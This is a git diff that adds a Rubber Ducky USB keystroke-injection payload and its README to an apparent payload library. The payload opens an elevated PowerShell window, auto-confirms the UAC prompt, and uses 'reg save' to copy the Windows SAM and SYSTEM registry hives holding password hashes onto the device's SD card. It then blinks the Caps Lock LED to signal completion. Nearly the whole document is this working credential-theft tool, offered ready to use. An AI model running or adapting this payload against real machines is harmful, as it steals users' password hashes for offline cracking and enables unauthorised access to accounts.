diff --git a/payloads/library/exfiltration/NTLM_ducky/README.md b/payloads/library/exfiltration/NTLM_ducky/README.md new file mode 100644 index 0000000..ee4adfe --- /dev/null +++ b/payloads/library/exfiltration/NTLM_ducky/README.md @@ -0,0 +1,29 @@ +# Exfiltrate NTLM Hash - Windows ✅ + +A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card. + +## Description + +This payload script captures and exfiltrates NTLM hash files from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, onto the Rubber Ducky's SD card for later extraction and analysis. Upon successful file extraction, the payload triggers a visual confirmation by blinking the Caps Lock LED + + +### Settings + +- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`). +- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks). + +## Credits + +

Luu176

+
+ + + + +
+ + + +
GitHub +
+
diff --git a/payloads/library/exfiltration/NTLM_ducky/payload.txt b/payloads/library/exfiltration/NTLM_ducky/payload.txt new file mode 100644 index 0000000..7cb167e --- /dev/null +++ b/payloads/library/exfiltration/NTLM_ducky/payload.txt @@ -0,0 +1,81 @@ +REM_BLOCK +TITLE Exfiltrate NTLM Hash Files onto Ducky Storage +AUTHOR Luu176 +DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users + on the current Windows device) to the Rubber Ducky's SD card for further analysis. + It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to + the defined storage drive on the Ducky device. +END_REM + +DEFINE #driveLabel DUCKY +REM below you can set the number of blinks for the caps lock when finished (default 9) +DEFINE #numBlinks 9 + +ATTACKMODE HID STORAGE + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +SAVE_HOST_KEYBOARD_LOCK_STATE +IF ($_CAPSLOCK_ON == TRUE) + CAPSLOCK +END_IF +GUI d +DELAY 1000 +GUI r +DELAY 500 +STRINGLN powershell Start-Process powershell -Verb runAs +DELAY 800 +ALT y +DELAY 800 +STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit +GUI d +WAIT_FOR_CAPS_ON +REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download) +VAR $i = 0 +WHILE ( $i < #numBlinks ) + DELAY 150 + CAPSLOCK + $i = ( $i + 1 ) +END_WHILE +RESTORE_HOST_KEYBOARD_LOCK_STATE